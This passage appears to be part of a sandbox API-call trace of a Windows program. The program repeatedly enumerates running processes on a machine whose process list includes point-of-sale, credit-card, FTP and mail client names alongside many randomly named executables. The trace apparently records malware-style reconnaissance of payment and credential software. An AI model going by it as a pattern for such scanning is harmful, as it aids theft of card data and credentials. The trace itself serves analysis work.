cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0256.080] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0256.081] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0256.083] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0256.084] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0256.086] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0256.087] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0256.105] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0256.107] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0256.108] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0256.110] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0256.111] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0256.113] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0256.114] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0256.115] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0256.117] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0256.118] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0256.120] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0256.121] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0256.123] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0256.124] CloseHandle (hObject=0x1018) returned 1 [0256.124] Sleep (dwMilliseconds=0x64) [0256.230] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0256.239] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.241] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0256.242] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0256.244] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0256.245] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0256.246] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0256.248] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0256.249] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0256.252] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0256.253] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.255] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.256] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0256.257] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.259] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.260] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.262] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.263] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.265] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.266] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.267] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0256.269] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0256.270] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0256.271] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.273] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.274] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0256.276] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0256.327] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0256.328] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0256.329] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.331] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0256.332] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0256.334] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0256.335] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0256.336] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0256.338] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0256.343] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0256.345] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0256.346] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0256.348] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0256.349] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0256.350] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0256.352] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0256.353] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0256.355] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0256.359] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0256.361] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0256.362] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0256.364] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0256.365] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0256.367] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0256.368] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0256.369] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0256.417] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0256.419] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0256.421] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0256.423] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0256.425] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0256.426] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0256.429] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0256.431] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0256.436] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0256.438] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0256.440] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0256.442] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, 